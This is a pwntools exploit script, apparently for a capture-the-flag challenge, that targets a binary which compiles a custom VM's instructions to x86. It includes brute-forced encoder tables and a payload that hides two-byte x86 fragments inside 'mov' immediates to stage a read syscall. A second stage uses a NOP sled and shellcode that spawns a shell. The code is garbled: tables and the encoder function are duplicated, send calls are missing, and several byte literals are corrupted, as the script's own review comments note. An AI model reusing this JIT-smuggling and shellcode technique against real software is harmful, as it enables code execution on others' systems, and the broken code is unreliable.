# hack gsp(2, 1, 1, 3, 0x1111) 0: 66 19 d3 sbb bx, dx
# hack gsp(2, 1, 2, 0, 0x1111) 0: 66 19 c1 sbb cx, ax
# hack gsp(2, 1, 2, 1, 0x1111) 0: 66 19 d9 sbb cx, bx
# hack gsp(2, 1, 2, 2, 0x1111) 0: 66 19 c9 sbb cx, cx
# hack gsp(2, 1, 2, 3, 0x1111) 0: 66 19 d1 sbb cx, dx
# hack gsp(2, 1, 3, 0, 0x1111) 0: 66 19 c2 sbb dx, ax
# hack gsp(2, 1, 3, 1, 0x1111) 0: 66 19 da sbb dx, bx
# hack gsp(2, 1, 3, 2, 0x1111) 0: 66 19 ca sbb dx, cx
# hack gsp(2, 1, 3, 3, 0x1111) 0: 66 19 d2 sbb dx, dx
### 4
# hack gsp(4, 1, 0, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 0, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 0, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 0, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 1, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 1, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 1, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 1, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 2, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 2, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 2, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 2, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 3, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 3, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 3, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 3, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 2, 0, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 0, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 0, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 0, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 1, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 1, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 1, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 1, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 2, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 2, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 2, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 2, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 3, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 3, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 3, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 3, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 4, 0, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 0, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 0, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 0, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 1, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 1, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 1, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 1, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 2, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 2, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 2, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 2, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 3, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 3, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 3, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 3, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 0, 0, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 0, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 0, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 0, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 1, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 1, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 1, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 1, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 2, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 2, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 2, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 2, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 3, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 3, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 3, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 3, 3, 0x1111) 0: 66 f7 d2 not dx
### ....
### ....
def gsp(opcode, cmd1=0, o1=0, o2=0, data=0xbeef):
    """Encode one 32-bit instruction word for the target's VM.

    Layout, low bits first: cmd1 in bits 0-3, opcode in bits 4-7, o2 in bits
    8-11, o1 in bits 12-15 and the 16-bit immediate ``data`` in bits 16-31.
    The fields are summed rather than OR-ed, so an operand outside its nibble
    spills into the neighbouring field instead of being masked. Returns the
    word packed little-endian with p32(), which raises if the sum exceeds 32
    bits. The "# hack" tables above were produced by sweeping o1/o2 here.
    """
    low = (opcode << 4) + cmd1
    mid = ((o1 << 4) + o2) << 8
    high = data << 16
    return p32(low + mid + high)
# 0x123406050807
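# Brute-force the VM's instruction encoder: for every (o1, o2) pair of the
# fixed opcode/cmd1, spawn a fresh target, feed it one instruction and print
# the x86 bytes it emitted (the "# hack" tables above came from this loop).
opcode = 4
cmd1 = 4
for o1 in range(0x10):
    for o2 in range(0x10):
        io = start([])
        try:
            pay = gsp(opcode, cmd1, o1, o2, 0x1111)
            # NOTE(review): nothing here sends `pay`; the send call appears to
            # have been lost from the listing and must be restored before the
            # recv below, which otherwise blocks.
            ru(b'Sorry, I forget to set the memory region writable...\n')
            data = ru(p64(0))[:-9]
            if data:
                print(f'gsp({opcode}, {cmd1}, {o1}, {o2}, 0x1111)', '# hack', disasm(data))
        finally:
            # 256 targets are spawned; without closing each one the child
            # processes and their pipes accumulate for the whole run.
            io.close()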
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
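# Thin aliases over the pwntools tube `io`, which is assigned further down
# (io = start(...)). Each lambda looks `io` up at call time, so none of them
# may be used before that assignment runs.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak, right-padding with NULs to the word size.
# The fill must be a single byte: the rendered listing had lost the backslash
# (b'x00' is three bytes and makes ljust() raise TypeError), restored here.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# Debug printer: lss('libc_base') logs that global in red. It evaluates its
# argument with eval(), so pass only literal variable names written in this
# script -- never a string derived from the target's output.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))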
attack = ''
binary = './patch/chall'
def start(argv=[], *a, **kw):
    """Spawn the target the way the command line asks for.

    GDB=1 runs the binary under gdb with ``gdbscript``; TAG=host:port connects
    to that address; REM=1 connects to ``attack`` (which must be set to a
    "host:port" string first -- it is empty by default); otherwise the binary
    is started locally with ``argv`` appended. ``argv`` is never mutated.
    """
    if args.GDB:
        tube = gdb.debug(binary, gdbscript)
    elif args.TAG:
        tube = remote(*args.TAG.split(':'))
    elif args.REM:
        tube = remote(*attack.split(':'))
    else:
        tube = process([binary] + argv, *a, **kw)
    return tube
#context(binary = binary, log_level = 'info',
# Make pwntools treat ./patch/chall (the patched copy, see the note above) as
# the target binary, log every byte sent and received, and open gdb in a tmux
# side pane.
context.update(
    binary=binary,
    log_level='debug',
    terminal=['tmux', 'splitw', '-h', '-l', '170'],
)
# The libc pwntools resolves for that binary.
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
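# gdb commands for GDB=1 runs; `brva` is the pwndbg "break at RVA" command,
# so these are offsets into the (PIE) binary. The closing quotes had been lost
# in the rendered listing.
gdbscript = '''
#brva 0x02349
brva 0x01ECF
brva 0x0274D
brva 0x02479
'''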
#io = rmote()
#pay = flat({
### 0
# hack gsp(0, 1, 0, 0, 0x1111) 0: 66 b8 11 11 mov ax, 0x1111
# hack gsp(0, 1, 1, 0, 0x1111) 0: 66 bb 11 11 mov bx, 0x1111
# hack gsp(0, 1, 2, 0, 0x1111) 0: 66 b9 11 11 mov cx, 0x1111
# hack gsp(0, 1, 3, 0, 0x1111) 0: 66 ba 11 11 mov dx, 0x1111
# hack gsp(0, 0, 0, 0, 0x1111) 0: 66 89 c0 mov ax, ax
# hack gsp(0, 0, 0, 1, 0x1111) 0: 66 89 d8 mov ax, bx
# hack gsp(0, 0, 0, 2, 0x1111) 0: 66 89 c8 mov ax, cx
# hack gsp(0, 0, 0, 3, 0x1111) 0: 66 89 d0 mov ax, dx
# hack gsp(0, 0, 1, 0, 0x1111) 0: 66 89 c3 mov bx, ax
# hack gsp(0, 0, 1, 1, 0x1111) 0: 66 89 db mov bx, bx
# hack gsp(0, 0, 1, 2, 0x1111) 0: 66 89 cb mov bx, cx
# hack gsp(0, 0, 1, 3, 0x1111) 0: 66 89 d3 mov bx, dx
# hack gsp(0, 0, 2, 0, 0x1111) 0: 66 89 c1 mov cx, ax
# hack gsp(0, 0, 2, 1, 0x1111) 0: 66 89 d9 mov cx, bx
# hack gsp(0, 0, 2, 2, 0x1111) 0: 66 89 c9 mov cx, cx
# hack gsp(0, 0, 2, 3, 0x1111) 0: 66 89 d1 mov cx, dx
# hack gsp(0, 0, 3, 0, 0x1111) 0: 66 89 c2 mov dx, ax
# hack gsp(0, 0, 3, 1, 0x1111) 0: 66 89 da mov dx, bx
# hack gsp(0, 0, 3, 2, 0x1111) 0: 66 89 ca mov dx, cx
# hack gsp(0, 0, 3, 3, 0x1111) 0: 66 89 d2 mov dx, dx
### 1
# hack gsp(1, 1, 0, 0, 0x1111) 0: 66 11 c0 adc ax, ax
# hack gsp(1, 1, 0, 1, 0x1111) 0: 66 11 d8 adc ax, bx
# hack gsp(1, 1, 0, 2, 0x1111) 0: 66 11 c8 adc ax, cx
# hack gsp(1, 1, 0, 3, 0x1111) 0: 66 11 d0 adc ax, dx
# hack gsp(1, 1, 1, 0, 0x1111) 0: 66 11 c3 adc bx, ax
# hack gsp(1, 1, 1, 1, 0x1111) 0: 66 11 db adc bx, bx
# hack gsp(1, 1, 1, 2, 0x1111) 0: 66 11 cb adc bx, cx
# hack gsp(1, 1, 1, 3, 0x1111) 0: 66 11 d3 adc bx, dx
# hack gsp(1, 1, 2, 0, 0x1111) 0: 66 11 c1 adc cx, ax
# hack gsp(1, 1, 2, 1, 0x1111) 0: 66 11 d9 adc cx, bx
# hack gsp(1, 1, 2, 2, 0x1111) 0: 66 11 c9 adc cx, cx
# hack gsp(1, 1, 2, 3, 0x1111) 0: 66 11 d1 adc cx, dx
# hack gsp(1, 1, 3, 0, 0x1111) 0: 66 11 c2 adc dx, ax
# hack gsp(1, 1, 3, 1, 0x1111) 0: 66 11 da adc dx, bx
# hack gsp(1, 1, 3, 2, 0x1111) 0: 66 11 ca adc dx, cx
# hack gsp(1, 1, 3, 3, 0x1111) 0: 66 11 d2 adc dx, dx
# hack gsp(1, 0, 0, 0, 0x1111) 0: 66 01 c0 add ax, ax
# hack gsp(1, 0, 0, 1, 0x1111) 0: 66 01 d8 add ax, bx
# hack gsp(1, 0, 0, 2, 0x1111) 0: 66 01 c8 add ax, cx
# hack gsp(1, 0, 0, 3, 0x1111) 0: 66 01 d0 add ax, dx
# hack gsp(1, 0, 1, 0, 0x1111) 0: 66 01 c3 add bx, ax
# hack gsp(1, 0, 1, 1, 0x1111) 0: 66 01 db add bx, bx
# hack gsp(1, 0, 1, 2, 0x1111) 0: 66 01 cb add bx, cx
# hack gsp(1, 0, 1, 3, 0x1111) 0: 66 01 d3 add bx, dx
# hack gsp(1, 0, 2, 0, 0x1111) 0: 66 01 c1 add cx, ax
# hack gsp(1, 0, 2, 1, 0x1111) 0: 66 01 d9 add cx, bx
# hack gsp(1, 0, 2, 2, 0x1111) 0: 66 01 c9 add cx, cx
# hack gsp(1, 0, 2, 3, 0x1111) 0: 66 01 d1 add cx, dx
# hack gsp(1, 0, 3, 0, 0x1111) 0: 66 01 c2 add dx, ax
# hack gsp(1, 0, 3, 1, 0x1111) 0: 66 01 da add dx, bx
# hack gsp(1, 0, 3, 2, 0x1111) 0: 66 01 ca add dx, cx
# hack gsp(1, 0, 3, 3, 0x1111) 0: 66 01 d2 add dx, dx
### 2
# hack gsp(2, 0, 0, 0, 0x1111) 0: 66 29 c0 sub ax, ax
# hack gsp(2, 0, 0, 1, 0x1111) 0: 66 29 d8 sub ax, bx
# hack gsp(2, 0, 0, 2, 0x1111) 0: 66 29 c8 sub ax, cx
# hack gsp(2, 0, 0, 3, 0x1111) 0: 66 29 d0 sub ax, dx
# hack gsp(2, 0, 1, 0, 0x1111) 0: 66 29 c3 sub bx, ax
# hack gsp(2, 0, 1, 1, 0x1111) 0: 66 29 db sub bx, bx
# hack gsp(2, 0, 1, 2, 0x1111) 0: 66 29 cb sub bx, cx
# hack gsp(2, 0, 1, 3, 0x1111) 0: 66 29 d3 sub bx, dx
# hack gsp(2, 0, 2, 0, 0x1111) 0: 66 29 c1 sub cx, ax
# hack gsp(2, 0, 2, 1, 0x1111) 0: 66 29 d9 sub cx, bx
# hack gsp(2, 0, 2, 2, 0x1111) 0: 66 29 c9 sub cx, cx
# hack gsp(2, 0, 2, 3, 0x1111) 0: 66 29 d1 sub cx, dx
# hack gsp(2, 0, 3, 0, 0x1111) 0: 66 29 c2 sub dx, ax
# hack gsp(2, 0, 3, 1, 0x1111) 0: 66 29 da sub dx, bx
# hack gsp(2, 0, 3, 2, 0x1111) 0: 66 29 ca sub dx, cx
# hack gsp(2, 0, 3, 3, 0x1111) 0: 66 29 d2 sub dx, dx
# hack gsp(2, 1, 0, 0, 0x1111) 0: 66 19 c0 sbb ax, ax
# hack gsp(2, 1, 0, 1, 0x1111) 0: 66 19 d8 sbb ax, bx
# hack gsp(2, 1, 0, 2, 0x1111) 0: 66 19 c8 sbb ax, cx
# hack gsp(2, 1, 0, 3, 0x1111) 0: 66 19 d0 sbb ax, dx
# hack gsp(2, 1, 1, 0, 0x1111) 0: 66 19 c3 sbb bx, ax
# hack gsp(2, 1, 1, 1, 0x1111) 0: 66 19 db sbb bx, bx
# hack gsp(2, 1, 1, 2, 0x1111) 0: 66 19 cb sbb bx, cx
# hack gsp(2, 1, 1, 3, 0x1111) 0: 66 19 d3 sbb bx, dx
# hack gsp(2, 1, 2, 0, 0x1111) 0: 66 19 c1 sbb cx, ax
# hack gsp(2, 1, 2, 1, 0x1111) 0: 66 19 d9 sbb cx, bx
# hack gsp(2, 1, 2, 2, 0x1111) 0: 66 19 c9 sbb cx, cx
# hack gsp(2, 1, 2, 3, 0x1111) 0: 66 19 d1 sbb cx, dx
# hack gsp(2, 1, 3, 0, 0x1111) 0: 66 19 c2 sbb dx, ax
# hack gsp(2, 1, 3, 1, 0x1111) 0: 66 19 da sbb dx, bx
# hack gsp(2, 1, 3, 2, 0x1111) 0: 66 19 ca sbb dx, cx
# hack gsp(2, 1, 3, 3, 0x1111) 0: 66 19 d2 sbb dx, dx
### 4
# hack gsp(4, 1, 0, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 0, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 0, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 0, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 1, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 1, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 1, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 1, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 2, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 2, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 2, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 2, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 3, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 3, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 3, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 3, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 2, 0, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 0, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 0, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 0, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 1, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 1, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 1, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 1, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 2, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 2, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 2, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 2, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 3, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 3, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 3, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 3, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 4, 0, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 0, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 0, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 0, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 1, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 1, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 1, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 1, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 2, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 2, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 2, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 2, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 3, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 3, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 3, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 3, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 0, 0, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 0, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 0, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 0, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 1, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 1, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 1, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 1, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 2, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 2, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 2, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 2, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 3, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 3, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 3, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 3, 3, 0x1111) 0: 66 f7 d2 not dx
# The tube every alias above talks to (start() picks local/gdb/remote).
io = start()
def gsp(opcode, cmd1=0, o1=0, o2=0, data=0xbeef):
    """Encode one 32-bit instruction word for the target's VM.

    Layout, low bits first: cmd1 in bits 0-3, opcode in bits 4-7, o2 in bits
    8-11, o1 in bits 12-15 and the 16-bit immediate ``data`` in bits 16-31.
    The fields are summed rather than OR-ed, so an operand outside its nibble
    spills into the neighbouring field instead of being masked. Returns the
    word packed little-endian with p32(), which raises if the sum exceeds 32
    bits. The "# hack" tables above map (opcode, cmd1, o1, o2) to the x86
    bytes the VM emits for the word.
    """
    low = (opcode << 4) + cmd1
    mid = ((o1 << 4) + o2) << 8
    high = data << 16
    return p32(low + mid + high)
#gdb.attach(io,gdbscript=gdbscript+'brva 0x01CD5')
#pay = gsp(opcode, cmd1, o1, o2, 0x2)
# VM program, one gsp() word per instruction. The trick, per the encoder table
# above: gsp(0,1,0,0,imm) makes the VM emit `66 b8 <imm16>` (mov ax, imm), so
# the immediate carries two bytes of attacker-chosen x86; gsp(4,4,7,4,..)
# emits `eb 11` (jmp +0x11) and gsp(9,...) emits a one-byte hlt, so 15 hlts
# plus the 2-byte `66 b8` prefix are exactly the 0x11 bytes the jmp skips,
# landing execution on the immediate. Two-byte x86 fragments are strung
# together this way.
pay = b''
#pay += gsp(0, 1, 0, 0, 0x1111)# 0: 66 b8 11 11 mov ax, 0x1111
#pay += gsp(0, 1, 0, 0, 0x1111)# 0: 66 b8 11 11 mov ax, 0x1111
#pay += gsp(4, 0, 0, 0, 0x1111)
#pay += gsp(6, 1, 12, 4, 0x1111)
#pay += gsp(5, 0, 0, 0, 0x3)# 0: 66 b8 11 11 mov ax, 0x1111i
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF # hlt pad
# fragment 1: `pop rax; pop rdi` as the mov immediate
pay += gsp(0, 1, 0, 0, u16(asm('pop rax;pop rdi')))# 0: 66 b8 11 11 mov ax,
# VM-level arithmetic between fragments (mov bx / sub ax,bx / mov dx); what the
# target does with ax/dx here is not visible from the listing.
pay += gsp(0, 1, 1, 0, 0x15db)# 0: 66 bb 11 11 mov bx, 0x1111
pay += gsp(2, 0, 0, 1, 0)# 0: 66 29 d8 sub ax, bx
pay += gsp(0, 1, 3, 0, 0x7)# 0: 66 ba 11 11 mov dx, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rdi;pop rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rdi;pop rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
# NOTE(review): 'fxbe' looks garbled (escapes lost in rendering) -- u16 needs
# exactly two bytes; recover the intended pair from the original script.
pay += gsp(0, 1, 0, 0, u16('fxbe'))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('call rax')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('push 0')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('push 0')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('pop rax;push rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
# read(…, …, 0x500)-style setup: rsi/rdi from the stack, dx = 0x500, then the
# raw syscall fragment followed by nop pairs.
pay += gsp(0, 1, 0, 0, u16(asm('pop rsi;pop rdi')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 3, 0, 0x500)# 0: 66 ba 11 11 mov dx, 0x1111
pay += gsp(4, 4, 7, 4, 0x1111)# 0: eb 11 jmp 0x13
pay += gsp(9, 0, 0, 0, 0xFFFF) *0xF# hlt
pay += gsp(0, 1, 0, 0, u16(asm('syscall')))# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
pay += gsp(0, 1, 0, 0, 0x9090)# 0: 66 b8 11 11 mov ax, 0x1111
# NOTE(review): this reassignment discards the VM program built above; it is
# presumably the second stage read in by the syscall (a nop sled plus a
# shell), with the send calls for both stages lost from the listing. The sled
# byte has also lost its backslash: it should be b'\x90', not the three-byte
# b'x90'. The note after the script says the attempt was abandoned.
pay = b'x90' * 0x200
pay += asm(shellcraft.sh())
被C++ 击败了
